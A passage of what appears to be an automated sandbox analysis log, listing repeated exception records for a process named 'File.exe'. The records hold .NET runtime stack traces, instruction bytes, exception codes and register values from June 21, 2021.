clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b2 3e 83 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x62722b registers.esp: 3923332 registers.edi: 3923352 registers.eax: 0 registers.ebp: 3923364 registers.edx: 46036548 registers.ebx: 3923664 registers.esi: 46036548 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x7471be 0x7466b9 0x746249 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x740234 0x7400b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b2 3e 71 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74722b registers.esp: 2612820 registers.edi: 2612840 registers.eax: 0 registers.ebp: 2612852 registers.edx: 37229096 registers.ebx: 2613152 registers.esi: 37229096 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x7471d0 0x7466b9 0x746249 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x740234 0x7400b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b2 3e 71 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x74722b registers.esp: 2612820 registers.edi: 2612840 registers.eax: 0 registers.ebp: 2612852 registers.edx: 42282808 registers.ebx: 2613152 registers.esi: 42282808 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: file+0x5f0f @ 0x405f0f file+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.symbol: file+0x38b0 exception.instruction: int3 exception.module: File.exe exception.exception_code: 0x80000003 exception.offset: 14512 exception.address: 0x4038b0 registers.esp: 3930452 registers.edi: 7812320 registers.eax: 46678859 registers.ebp: 3930468 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 7763280 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: file+0x5f0f @ 0x405f0f file+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 b8 0c 00 00 00 58 b9 e8 03 00 00 e8 exception.symbol: file+0x38c2 exception.instruction: int3 exception.module: File.exe exception.exception_code: 0x80000003 exception.offset: 14530 exception.address: 0x4038c2 registers.esp: 3930452 registers.edi: 7812320 registers.eax: 46678859 registers.ebp: 3930468 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 7763280 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: file+0x5f0f @ 0x405f0f file+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.symbol: file+0x38d6 exception.instruction: int3 exception.module: File.exe exception.exception_code: 0x80000003 exception.offset: 14550 exception.address: 0x4038d6 registers.esp: 3930452 registers.edi: 7812320 registers.eax: 0 registers.ebp: 3930468 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 7763280 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: file+0x5f0f @ 0x405f0f file+0x645b @ 0x40645b BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc e8 f6 51 00 00 8b d8 50 52 81 f2 90 00 00 00 exception.symbol: file+0x38e8 exception.instruction: int3 exception.module: File.exe exception.exception_code: 0x80000003 exception.offset: 14568 exception.address: 0x4038e8 registers.esp: 3930452 registers.edi: 7812320 registers.eax: 0 registers.ebp: 3930468 registers.edx: 4294826996 registers.ebx: 0 registers.esi: 7763280 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xb5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xb38b0 registers.esp: 2030212 registers.edi: 7045856 registers.eax: 46678984 registers.ebp: 2030228 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 7052808 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xb5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 b8 0c 00 00 00 58 b9 e8 03 00 00 e8 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xb38c2 registers.esp: 2030212 registers.edi: 7045856 registers.eax: 46678984 registers.ebp: 2030228 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 7052808 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xb5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc 50 33 c0 0f 9b c0 52 33 d0 c1 e2 02 92 5a 0b exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xb38d6 registers.esp: 2030212 registers.edi: 7045856 registers.eax: 0 registers.ebp: 2030228 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 7052808 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0xb5f0f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: cc e8 f6 51 00 00 8b d8 50 52 81 f2 90 00 00 00 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0xb38e8 registers.esp: 2030212 registers.edi: 7045856 registers.eax: 0 registers.ebp: 2030228 registers.edx: 2130566132 registers.ebx: 2130567168 registers.esi: 7052808 registers.ecx: 1990732924	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45a5 @ 0x6eed45a5 mscorlib+0x2f74d4 @ 0x6eed74d4 mscorlib+0x30c46d @ 0x6eeec46d system+0xea3b4 @ 0x644ea3b4 system+0xcec2d @ 0x644cec2d system+0x6f7869 @ 0x658e7869 system+0x6f6e71 @ 0x658e6e71 system+0x6f3892 @ 0x658e3892 system+0x6f3514 @ 0x658e3514 system+0x6f42ec @ 0x658e42ec 0x42051a 0x4200f4 0x4200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 4123312 registers.edi: 0 registers.eax: 4123312 registers.ebp: 4123392 registers.edx: 0 registers.ebx: 9127752 registers.esi: 8418904 registers.ecx: 2376685323	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x6fd51194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x6fc22ba1 mscorlib+0x2f45aa @ 0x6eed45aa mscorlib+0x2f74d4 @ 0x6eed74d4 mscorlib+0x30c46d @ 0x6eeec46d system+0x9f2d4 @ 0x70baf2d4 system+0xa7fe5 @ 0x70bb7fe5 system+0xab6a2 @ 0x70bbb6a2 system+0xa1e00 @ 0x70bb1e00 system+0x6f4ce3 @ 0x658e4ce3 system+0x6f6fb8 @ 0x658e6fb8 system+0x6f3892 @ 0x658e3892 system+0x6f3514 @ 0x658e3514 system+0x6f42ec @ 0x658e42ec 0x42051a 0x4200f4 0x4200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 4122956 registers.edi: 0 registers.eax: 4122956 registers.ebp: 4123036 registers.edx: 0 registers.ebx: 9127752 registers.esi: 8418904 registers.ecx: 2376684715	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x42813e 0x427639 0x4271c9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x420234 0x4200b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 32 2f a3 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4281ab registers.esp: 4119060 registers.edi: 4119080 registers.eax: 0 registers.ebp: 4119092 registers.edx: 37687848 registers.ebx: 4119392 registers.esi: 37687848 registers.ecx: 0	1
__exception__ June 21, 2021, 12:57 p.m.	stacktrace: 0x428150 0x427639 0x4271c9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 